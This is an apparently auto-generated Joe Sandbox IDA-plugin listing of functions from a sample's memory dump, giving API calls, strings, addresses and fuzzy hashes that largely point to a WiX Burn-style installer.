Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-4270472870
Opcode ID: ac7469c426b92220a7221462f34b9c350f63b25a3c1b6c80e28e494e029d75f4
Instruction ID: 8139a9a5cb0f149a7e5b8fcf559873a888c6304cb9d55a4681c0a8900bcf8722
Opcode Fuzzy Hash: ac7469c426b92220a7221462f34b9c350f63b25a3c1b6c80e28e494e029d75f4
Instruction Fuzzy Hash: 4C01B13295512DFBCF216E54CC09A9E7F65BF14721F018127FC08AA222D3369E10E7D0

Function 005975AA Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 005975B6
LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0059761D

Strings

Failed to get value as version for variable: %ls, xrefs: 0059760C
Failed to get value of variable: %ls, xrefs: 005975F0

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-1851729331
Opcode ID: 0ec2ab44c88d28edfcd3461641aba6fe9a29adbec2579233e40f2daa7b5b97e3
Instruction ID: 77a3f9fed325e9f0cca2b4a756ad8cf097973c5965ccf74ddc6bdab34e3bd17f
Opcode Fuzzy Hash: 0ec2ab44c88d28edfcd3461641aba6fe9a29adbec2579233e40f2daa7b5b97e3
Instruction Fuzzy Hash: 2D019E3291552DFBCF225E88CC09A9E7F25BF14720F014163FC04AA221D3369A10A7D4

Function 00597539 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,00599897,00000000,?,00000000,00000000,00000000,?,005996D6,00000000,?,00000000,00000000), ref: 00597545
LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,00599897,00000000,?,00000000,00000000,00000000,?,005996D6,00000000,?,00000000), ref: 0059759B

Strings

Failed to copy value of variable: %ls, xrefs: 0059758A
Failed to get value of variable: %ls, xrefs: 0059756B

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-2936390398
Opcode ID: 7f2d97850d275cd0a03be54dafdec6f2fbe05ef4603e459fc17d436722086373
Instruction ID: 3747fb7f7ef42f2d0f6cde4d06e68e48a161165e3207ff9b142e0ad214b19274
Opcode Fuzzy Hash: 7f2d97850d275cd0a03be54dafdec6f2fbe05ef4603e459fc17d436722086373
Instruction Fuzzy Hash: DFF06D7695122DFBCF226F94CC0999E7F29FF18361F014152FC04A6260D7369A20ABD0

Function 005BE776 Relevance: 6.0, APIs: 4, Instructions: 26timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 005BE788
GetCurrentThreadId.KERNEL32 ref: 005BE797
GetCurrentProcessId.KERNEL32 ref: 005BE7A0
QueryPerformanceCounter.KERNEL32(?), ref: 005BE7AD

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61f339d6bb7095908f6ba562cc620b8a669149f026259b45b016ed4baf00d8ff
Instruction ID: 5aa3430ed78e36d4d0a1def0cb8c3280f8725db8b055022ba051f3c8f1b22b52
Opcode Fuzzy Hash: 61f339d6bb7095908f6ba562cc620b8a669149f026259b45b016ed4baf00d8ff
Instruction Fuzzy Hash: 71F09D70C1220DEBDB10DBF4D949A9EBBF8EF18301F52489AA411E7110E734AB08EB61

Function 005D0C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 005D0DD7

Strings

regutil.cpp, xrefs: 005D0DC4

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Close
String ID: regutil.cpp
API String ID: 3535843008-955085611
Opcode ID: 58b53c43d220295996070b0a2a1de69d5e790d4365fd15459760d7da61e90bd1
Instruction ID: 1b056bb30f7c1a9b9cad86d1e98547e4e80e220b31cac98526789c097552f34d
Opcode Fuzzy Hash: 58b53c43d220295996070b0a2a1de69d5e790d4365fd15459760d7da61e90bd1
Instruction Fuzzy Hash: D641B532D0112AEBDF31AADCCC047ADBE62BB44721F259167F914AA3E0D7349D80A7D4

Function 005D479B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,005FAAA0,00000000,?,005D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 005D0F80

RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 005D48FC

Strings

SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 005D47AC
PendingFileRenameOperations, xrefs: 005D47EC, 005D48D4

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
API String ID: 47109696-3023217399
Opcode ID: 4a0c41cd405800f36ae7e60e3cc4937e88d7aa04e6f60b7945ad99ad5f005549
Instruction ID: fe0461f5a338e6cdbd4e9639d21beba63125e29594987d95bc9678df0bbd7389
Opcode Fuzzy Hash: 4a0c41cd405800f36ae7e60e3cc4937e88d7aa04e6f60b7945ad99ad5f005549
Instruction Fuzzy Hash: BC414635E00259EBCB309F98C885AAEBFB6FB44B90F2540ABE504A7311D7319E41EB50

Function 005D10B5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 005D112B
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 005D1163

Strings

regutil.cpp, xrefs: 005D11A9

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: QueryValue
String ID: regutil.cpp
API String ID: 3660427363-955085611
Opcode ID: 7930f3bab5bff134270590c164d40fde1c6836da4759e4c1d1dfbff3d7318061
Instruction ID: 39972a83a9075dd6d45b7806e59745570f5792e97b19c2e556b20fa668e47a44
Opcode Fuzzy Hash: 7930f3bab5bff134270590c164d40fde1c6836da4759e4c1d1dfbff3d7318061
Instruction Fuzzy Hash: E7416B76D0092AFBDB209ED88C459AEBFB9FF44350F10456BEA11A7350D7318E10DB94

Function 005C66D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(005DB518,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 005C67A3
GetLastError.KERNEL32 ref: 005C67BF

Strings

comres.dll, xrefs: 005C674A, 005C6798, 005C67D4

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: comres.dll
API String ID: 203985260-246242247
Opcode ID: db3fe182c646b86cb2eb1ac1fbd62a1dfbaafdc6208fd51e45d01ba9c9814ae4
Instruction ID: 819f485f4f5d3632395a4bac21521080fe9670f1b47fae210b1618d113d6a817
Opcode Fuzzy Hash: db3fe182c646b86cb2eb1ac1fbd62a1dfbaafdc6208fd51e45d01ba9c9814ae4
Instruction Fuzzy Hash: C131A035600216AFCB21AED4C989FAB7FE8FF85754F14486DF9145A191DB708F40C7A1

Function 005D8F7A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D8E44: lstrlenW.KERNEL32(00000100,?,?,?,005D9217,000002C0,00000100,00000100,00000100,?,?,?,005B7D87,?,?,000001BC), ref: 005D8E69

RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,005DB500,wininet.dll,?), ref: 005D907A
RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,005DB500,wininet.dll,?), ref: 005D9087

Part of subcall function 005D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,005FAAA0,00000000,?,005D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 005D0F80

Part of subcall function 005D0E4F: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,005B8E1B), ref: 005D0EAA
Part of subcall function 005D0E4F: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,005B8E1B,00000000), ref: 005D0EC8

Strings

wininet.dll, xrefs: 005D8FEF, 005D903C

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Close$EnumInfoOpenQuerylstrlen
String ID: wininet.dll
API String ID: 2680864210-3354682871
Opcode ID: f663541e46e4963b1532d8ff017da535f5523cac4bad5ebb0c9fafde6d0f9aad
Instruction ID: 45499c12e886c028fb517495593cd271d189e3cd4ce9a3c2731aca1a22ff9411
Opcode Fuzzy Hash: f663541e46e4963b1532d8ff017da535f5523cac4bad5ebb0c9fafde6d0f9aad
Instruction Fuzzy Hash: C6311872C0112AEBCF31AF98D9488AEBF79FF44710B55417BEA10B6221D7318E50EB90

Function 005D939E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D8E44: lstrlenW.KERNEL32(00000100,?,?,?,005D9217,000002C0,00000100,00000100,00000100,?,?,?,005B7D87,?,?,000001BC), ref: 005D8E69

RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 005D9483
RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000,00000000,?), ref: 005D949D

Part of subcall function 005D0BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,005A061A,?,00000000,00020006), ref: 005D0C0E

Part of subcall function 005D14F4: RegSetValueExW.ADVAPI32(00020006,005E0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0059F335,00000000,?,00020006), ref: 005D1527

Part of subcall function 005D14F4: RegDeleteValueW.ADVAPI32(00020006,005E0D10,00000000,?,?,0059F335,00000000,?,00020006,?,005E0D10,00020006,00000000,?,?,?), ref: 005D1557

Part of subcall function 005D14A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0059F28D,005E0D10,Resume,00000005,?,00000000,00000000,00000000), ref: 005D14BB

Strings

%ls\%ls, xrefs: 005D93FF

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Value$Close$CreateDeletelstrlen
String ID: %ls\%ls
API String ID: 3924016894-2125769799
Opcode ID: 2e5bd51e42080bfa3c393d0e7da1d0afef61578aba7d23979ff46daa512b8c5c
Instruction ID: 6990e4888f5b70f7067343616bf55fca758b16eda6a58859c5ec67d4680a8664
Opcode Fuzzy Hash: 2e5bd51e42080bfa3c393d0e7da1d0afef61578aba7d23979ff46daa512b8c5c
Instruction Fuzzy Hash: B5311C76C0112EBF8F21AFD9CC458AEBF79FF44310B054167EA14A6222D7358E11EB91

Function 00593A4D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00593AB0

Strings

crypt32.dll, xrefs: 00593A6D, 00593AAC, 00593AAE
wininet.dll, xrefs: 00593A6E

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: _memcpy_s
String ID: crypt32.dll$wininet.dll
API String ID: 2001391462-82500532
Opcode ID: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
Instruction ID: da4d684b372cc140ec01cb8ee9f80911a42d1b74b7a3d207d5e4d131367ecf3f
Opcode Fuzzy Hash: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
Instruction Fuzzy Hash: 80115E71600219ABCF18DE19CD899AFBF69EF94394B14802AFC058B311D271EA10CAE0

Function 005D14F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00020006,005E0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0059F335,00000000,?,00020006), ref: 005D1527
RegDeleteValueW.ADVAPI32(00020006,005E0D10,00000000,?,?,0059F335,00000000,?,00020006,?,005E0D10,00020006,00000000,?,?,?), ref: 005D1557

Strings

regutil.cpp, xrefs: 005D158B

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Value$Delete
String ID: regutil.cpp
API String ID: 1738766685-955085611
Opcode ID: bee0c5f26462dcfe7c902620cc6abdac8943ba15248429df2bfef0e1d223ec8f
Instruction ID: 2853d7fa1da2f1814a8ef9966fe913f068e4cfa6c578e0f9120fd141180b2f10
Opcode Fuzzy Hash: bee0c5f26462dcfe7c902620cc6abdac8943ba15248429df2bfef0e1d223ec8f
Instruction Fuzzy Hash: 0111A736951936F7DB314A9CAC05BAA7E14BB44760F150223FD02EA350DA39CD10AFE8

Function 0059DDB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,005B7691,00000000,IGNOREDEPENDENCIES,00000000,?,005DB518), ref: 0059DE04

Strings

IGNOREDEPENDENCIES, xrefs: 0059DDBB
Failed to copy the property value., xrefs: 0059DE38

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CompareString
String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
API String ID: 1825529933-1412343224
Opcode ID: f9dc69b7240a19d221b4722e588a03c8148931377e7edf6a03d2f8192a060260
Instruction ID: 95c401a504c5f4e8b7a387f1a4bb9b01e44f9b624986240cfa915e7b87c05ec3
Opcode Fuzzy Hash: f9dc69b7240a19d221b4722e588a03c8148931377e7edf6a03d2f8192a060260
Instruction Fuzzy Hash: E511A336204315AFDF215F55DC84FAABBBABF54320F25416AEA189F291C770A850C6A0

Function 005D563F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,005A8E97,?,00000001,20000004,00000000,00000000,?,00000000), ref: 005D566E
SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,005A8E97,?), ref: 005D5689

Strings

aclutil.cpp, xrefs: 005D56AD

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: InfoNamedSecuritySleep
String ID: aclutil.cpp
API String ID: 2352087905-2159165307
Opcode ID: 17d989f8a3f4e5ded0a2218d8853e7217300b28321ebd4943865166d0222ab81
Instruction ID: 63ab8779cc5630f1f6dba556728315fd1bf93057c541b85f496e228add306f20
Opcode Fuzzy Hash: 17d989f8a3f4e5ded0a2218d8853e7217300b28321ebd4943865166d0222ab81
Instruction Fuzzy Hash: D4013C37801529FBCF329E99CD09A9E7F65FB94B50F060157BE0466220D632CD20EAD0

Function 0059158C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(0000007F,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000,?,00592318,00000000,00000000), ref: 005915D0
GetLastError.KERNEL32(?,00592318,00000000,00000000,?,00000200,?,005D52B2,00000000,?,00000000,?,00000000,00000000,00000000), ref: 005915DA

Strings

strutil.cpp, xrefs: 005915FE

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLastString
String ID: strutil.cpp
API String ID: 3728238275-3612885251
Opcode ID: fc54fbe36f7737c919c817ab8c6431e37354aeb38cbaea42118c4fcfcc65dfed
Instruction ID: b3df6d7222c87d059c9c8750a5d3985ef8fac4f6a6b2990d6457c76c7dcc397b
Opcode Fuzzy Hash: fc54fbe36f7737c919c817ab8c6431e37354aeb38cbaea42118c4fcfcc65dfed
Instruction Fuzzy Hash: DE019233942A37B78F218A998C48E5B7E69FF85B60B060225FE10AB250D720DC1097E0

Function 005A57BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 005A57D9
CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 005A5833

Strings

Failed to initialize COM on cache thread., xrefs: 005A57E5

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: InitializeUninitialize
String ID: Failed to initialize COM on cache thread.
API String ID: 3442037557-3629645316
Opcode ID: 682d0059dcd95d461e68489cb34fa92da3ef1013f88af3884ac5f1b7e9dfac5d
Instruction ID: 6c4ae4292dcdc6e4ae48210d65aec7670329cc29dbccfd32c4f40962f5dcc6ad
Opcode Fuzzy Hash: 682d0059dcd95d461e68489cb34fa92da3ef1013f88af3884ac5f1b7e9dfac5d
Instruction Fuzzy Hash: 0901A17220161ABFCB148FA8D884DDAFBADFF08350B108126F608C7110DB30AD14D790

Function 005D3BF1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,005FAAA0,00000000,?,005D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 005D0F80

RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,005D3A8E,?), ref: 005D3C62

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 005D3C0C
EnableLUA, xrefs: 005D3C34

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseOpen
String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 47109696-3551287084
Opcode ID: 8316235d1d1bd391929a301aa238b816ded543a26e96e6c8542141cf60eab1fa
Instruction ID: 4ece82a023acd61237001b4c0fd3223920e6faff057cf440c20f32f031d3885c
Opcode Fuzzy Hash: 8316235d1d1bd391929a301aa238b816ded543a26e96e6c8542141cf60eab1fa
Instruction Fuzzy Hash: 2A017532911229FBD730A6A8C80A7ADFEB8EF14721F214167A900B7261D3755E5096D5

Function 00595123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00591104,?,?,00000000), ref: 00595142
CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00591104,?,?,00000000), ref: 00595172

Strings

burn.clean.room, xrefs: 0059512F, 0059513C, 00595169

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
